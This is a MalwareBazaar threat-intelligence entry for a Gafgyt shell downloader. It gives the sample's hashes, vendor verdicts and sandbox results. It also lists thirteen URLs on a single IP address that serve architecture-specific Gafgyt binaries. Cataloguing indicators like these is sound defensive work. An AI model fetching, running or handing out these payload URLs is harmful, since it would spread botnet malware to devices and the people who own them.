MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 dbe0b127987330a7331c97199e8ac8171e01c1f66e62ef7309aef5e8bd7fc615. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Gafgyt


Vendor detections: 5


Intelligence 5 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: dbe0b127987330a7331c97199e8ac8171e01c1f66e62ef7309aef5e8bd7fc615
SHA3-384 hash: 82c1b9f5010c236d22f64fa094408b6d7fef51436a89f685254faac20fc3cf33365b71337cc873536f371fffd965b7c2
SHA1 hash: 68b480c4195cf52672d65ae35b9bb8fd355d2364
MD5 hash: aebb35bf58a9bbd6350bacea057d0106
humanhash: speaker-jig-red-papa
File name:bins2.sh
Download: download sample
Signature Gafgyt
Create hunting rule
File size:3'113 bytes
First seen:2025-08-18 07:38:52 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 96:ohDQ459p3CeE6Xttz5XhwoHQ3oEPX/NqZKT/oj38l:myqS73PNt/C3c
TLSH T13E51D9F602360E658F93D91AF2759F853267D4F621874B68E4DBA23980CC42D7061F90
Magika shell
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://207.167.64.12/2.mipsf758f794dbd3d35b0c4236269b1b78913596c18868e0a25848249248405fc9f8 Gafgytelf gafgyt ua-wget
http://207.167.64.12/2.mpsl5d17d03d5f2ee245fc6cd1021d75913df3c959432b99d380e8a3638841062643 Gafgytelf gafgyt ua-wget
http://207.167.64.12/2.sh42167d964e35b585812d66a293dcb24748ecf0c6ea2c8c64d40c0ece6dcfbdaac Gafgytelf gafgyt ua-wget
http://207.167.64.12/2.x8614b8b6ac8a6d96e15edf83a71f042ca1b47128b8ba75439103eb88839f3eb898 Gafgytelf gafgyt ua-wget
http://207.167.64.12/2.arm672dbb20dccfd8bf3ba4e4b9d58a0d95de432e3e780a12f41bb171361e67776cd Gafgytelf gafgyt ua-wget
http://207.167.64.12/2.i686dfa2f76c20c39fbdd9d97f90fd9241f0635b3a0be6c238b0e11715e75c9c63ca Gafgytelf gafgyt ua-wget
http://207.167.64.12/2.ppcd28891a4b1871516cd07a57c125bc759492584ecb7ca43571dc26074bfeac8ab Gafgytelf gafgyt ua-wget
http://207.167.64.12/2.i5865612288ee73116ecf7178fd9fd98290352bdd8863178db3c3c07b4f742c19e67 Gafgytelf gafgyt ua-wget
http://207.167.64.12/2.m68k618b6921b8ab050ce00b3ae4f56decd6ea6c609b627c9ac62da1ca3d842f7f73 Gafgytelf gafgyt ua-wget
http://207.167.64.12/2.sparcc6b9d9efb681ff1ac0afe4b47103c519b68532bca79844f7e075e1ce999d74f8 Gafgytelf gafgyt ua-wget
http://207.167.64.12/2.arm4d71cd66700fc7e1c1f921bea1df0722cfd5ba411fb434e42323d83cbbd06c136 Gafgytelf gafgyt ua-wget
http://207.167.64.12/2.arm5f7c5e707383ac0efb2b3383e45c8e66a2bd3c5e66eff7244b691ba65741de7b0 Gafgytelf gafgyt ua-wget
http://207.167.64.12/2.arm758baecf3698e6810dd5fa6ce4cdf478f699270634f4a132314da68fc3e08c88a Gafgytelf gafgyt ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
30
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.Linux.Downloader-34.UNOFFICIAL
Create hunting rule

Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/dbe0b127987330a7331c97199e8ac8171e01c1f66e62ef7309aef5e8bd7fc615
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/dbe0b127987330a7331c97199e8ac8171e01c1f66e62ef7309aef5e8bd7fc615/
Verdict:
Malicious
Threat:
HEUR:Trojan-Downloader.Shell.Agent
Link:
https://tip.neiki.dev/file/dbe0b127987330a7331c97199e8ac8171e01c1f66e62ef7309aef5e8bd7fc615
Threat name:
Linux.Trojan.Geninst
Create hunting rule
Status:
Malicious
First seen:
2025-08-18 03:06:23 UTC
File Type:
Text (Shell)
AV detection:
18 of 38 (47.37%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=3pqlcj4yomykomy4s4mz5cwic4padqpwnzro64yjv326rpl7yykq._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/250818-jg9hds1ydy/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Gafgyt

sh dbe0b127987330a7331c97199e8ac8171e01c1f66e62ef7309aef5e8bd7fc615

(this sample)

Gafgyt

elf f758f794dbd3d35b0c4236269b1b78913596c18868e0a25848249248405fc9f8

  
URLhaus
https://urlhaus.abuse.ch/url/3605539/
  
Delivery method
Distributed via web download
  
Dropping
MD5 efa6340385795cfb62ba3ebdb3509c9e
  
Dropping
SHA256 f758f794dbd3d35b0c4236269b1b78913596c18868e0a25848249248405fc9f8

Comments